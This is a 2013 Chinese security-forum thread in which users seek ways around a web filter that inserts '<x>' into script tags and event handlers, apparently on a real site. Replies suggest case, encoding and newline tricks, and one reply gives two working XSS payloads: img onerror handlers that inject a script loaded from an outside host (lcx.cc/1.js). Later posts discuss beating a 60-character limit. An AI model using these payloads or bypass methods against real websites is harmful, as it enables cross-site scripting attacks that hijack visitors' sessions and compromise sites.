script 变成sc<x>ript，还有javascript onload onmouseover 基本都是加入捣蛋的<x>

script 变成sc<x>ript，还有javascript onload onmouseover 基本都是加入捣蛋的<x> 
我在想，之前ewebeditor，style样式添加，asaspp来拿shell。那么这个<x>,可不可以也这样绕过呢。对了String.fromCharCode（47,120,115,115,46,114,101,47,54,5）里的数字会自动去掉，变成String.fromCharCode（471201151154611410147545）。URI编码也照样解析后加入<x>. 

总之我这几个小时一直研究，被<x>弄疯了。各位大牛，能给下思路吗？

1#醉入红尘梦 | 2013-12-15 02:10

已经搞定

 

2#blast | 2013-12-15 02:14

网易么。。记得网易有个手机站就是这么风骚。。

 

3#核攻击 | 2013-12-15 09:51

大小写、编码、回车换行字符

 

4#H.Shao | 2013-12-15 14:34

@醉入红尘梦 求搞定方法。技术交流

 

5#1ee | 2013-12-15 16:39

@醉入红尘梦 同求搞定方法

 

6#醉入红尘梦 | 2013-12-15 21:50

@核攻击 核总威武。顺便问下怎么加载js

 

7#D＆G | 2013-12-16 09:24

@醉入红尘梦 搞定了不分享么

 

8#Oops | 2013-12-16 10:55

2013-12-15 00:47---------->>2013-12-15 02:10

LZ搞了83分钟搞好了，为什么不分享！

自娱自乐啊，自问自答啊！

 

9#核攻击 | 2013-12-16 10:59

@醉入红尘梦 

<img src=# onerror=javascript:document.write('<scr'+'ipt src=\'http://lcx.cc/1.js\'></scr'+'ipt>')></img>

<img src=# onerror=javascript:window.s=document.createElement('script');window.s.src='http://lcx.cc/1.js';document.body.appendChild(window.s);></img>

 

10#醉入红尘梦 | 2013-12-16 20:41

@Oops @1ee @H.Shao @D＆G @核攻击 就是核总这个代码。但是核总，字符限制到60个。而且onerror也添加?<x>,发现+都过滤。。

 

11#猫头鹰 | 2013-12-17 08:41

我是不会告诉你我也遇到这个问题的~妈的恶心死了

 

12#Manning | 2013-12-20 14:47

前端限制字符，不一定服务器端限制字符数目啊

 

13#猫头鹰 | 2014-03-24 18:14

楼主你得绕过在哪里

 

14#Airbasic | 2014-03-25 11:03

楼主求细节啊

 

15#我来找快乐 | 2014-03-25 11:52

LZ不厚道，自己过了就不发细节